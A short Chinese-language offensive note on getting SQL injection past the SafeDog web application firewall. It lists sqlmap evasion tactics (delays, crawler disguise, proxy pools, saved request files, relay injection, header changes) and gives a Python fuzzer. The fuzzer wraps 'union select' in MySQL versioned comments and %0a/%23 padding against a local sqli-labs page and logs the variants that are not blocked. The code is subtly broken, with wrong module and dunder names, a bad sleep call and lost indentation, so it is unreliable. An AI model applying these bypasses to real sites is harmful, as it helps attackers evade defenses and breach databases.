攻防实战中,需要掌握一些特性,比如数据库,服务器,应用层,WAF层,以便更灵活的构造payload,甚至绕过安全防护措施进行漏洞利用。
sqlmap绕狗子时候,如果写的py脚本被拦截,有三种方式,延时,爬虫探测,代理池
其他参数狗子检测时,先保存为txt文本,然后-r,进行绕过,也可以中转注入进行本地数据包修改而后注入,本地搭建脚本(请求数据包自定义编写)
也可以写入本地php数据包,修改header头
import request,time
url='http://127.0.0.1/sqlilabs/less-2/?id=-1'
union = 'union'
select = 'select'
num = '1,2,3'
a = {'%0a','%23'}
aa= {'x'}
aaa = {'%0a','%23'}
b = '/*!'
c = '*/'
def bypass():
for du in a:
for dus in aa:
for duss in aaa:
for two in range(44500,44600): #版本号
urls=url+du+dus+duss+b+str(two)+union+c+du+dus+duss+select+du+dus+duss+num
#urls = url + du +dus +duss+union +du +dus +duss +b +str(two)+select+c +du+dus+duss+num
try:
result = request.get(urls).text
len_r = len(result)
if (result.find('safedog')==-1):
print('bypass url addres :' + urls + '|' +str(len_r))
if len_r == 715:
fp = open('url.txt','a+')
fp.write(urls+'
')
fp.close()
except Exception as err:
print('connecting error')
time.sleep(0,1)
if _name_ == '_main_':
print('fuzz start!')
bypass()